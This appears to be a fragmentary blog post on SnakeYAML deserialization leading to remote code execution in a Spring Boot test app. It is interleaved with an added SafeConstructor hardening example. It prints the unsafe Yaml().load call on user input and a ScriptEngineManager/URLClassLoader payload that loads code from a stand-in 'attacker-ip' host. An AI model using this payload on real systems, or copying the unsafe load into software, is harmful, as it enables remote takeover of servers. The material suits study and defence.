SnakeYAML Deserialization exploited

import org.yaml.snakeyaml.Yaml;

// The no-argument Yaml() uses the unrestricted Constructor, so any
// "!!fully.qualified.ClassName" global tag in the input is instantiated.
Yaml yaml = new Yaml();
Object obj = yaml.load(<--user input data-->);
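The hardened counterpart to the snippet above, added here as an example and not part of the original post: the same call with SafeConstructor, which builds only standard YAML types and refuses every global tag. It assumes SnakeYAML 1.33 or later (where SafeConstructor accepts a LoaderOptions; older 1.x releases use the no-argument SafeConstructor()); the class name SafeYamlLoad and the two input documents are constructed for illustration.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

public class SafeYamlLoad {

    // Vulnerable form from the post: the default constructor honours any
    // "!!fully.qualified.ClassName" tag and instantiates that class.
    static Object loadUnsafe(String userInput) {
        Yaml yaml = new Yaml();
        return yaml.load(userInput);
    }

    // Hardened form: SafeConstructor only constructs maps, lists, strings,
    // numbers, booleans, timestamps and the like, and throws a
    // ConstructorException (a YAMLException) for any global tag before
    // any application class is touched. Note that a typed
    // new Constructor(MyConfig.class) is NOT a safe substitute in 1.x:
    // it still honours arbitrary class tags.
    static Object loadSafe(String userInput) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(userInput);
    }

    public static void main(String[] args) {
        // Constructed sample input: ordinary configuration data.
        String benign = "name: demo\nport: 8081\nenabled: true\n";
        Map<?, ?> cfg = (Map<?, ?>) loadSafe(benign);
        System.out.println("benign document loaded: " + cfg);

        // Constructed sample input: the tag shape used in the post, with
        // no arguments. SafeConstructor rejects it outright.
        String tagged = "!!javax.script.ScriptEngineManager []\n";
        try {
            loadSafe(tagged);
            System.out.println("UNEXPECTED: global tag was accepted");
        } catch (YAMLException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Running the class prints the parsed map for the benign document and the "could not determine a constructor for the tag" rejection for the tagged one; pair the change with a dependency check, since the default Yaml() remains unsafe in every release.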
Changing the default port of Apache Tomcat
Include SnakeYAML library support in Spring Boot
Web UI for YAML data entry
YAML data parser testing from the UI and the Burp Suite proxy
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

javac <name-of-the-java-file>.java

Remote Code Execution successful

Swapneil Kumar Dash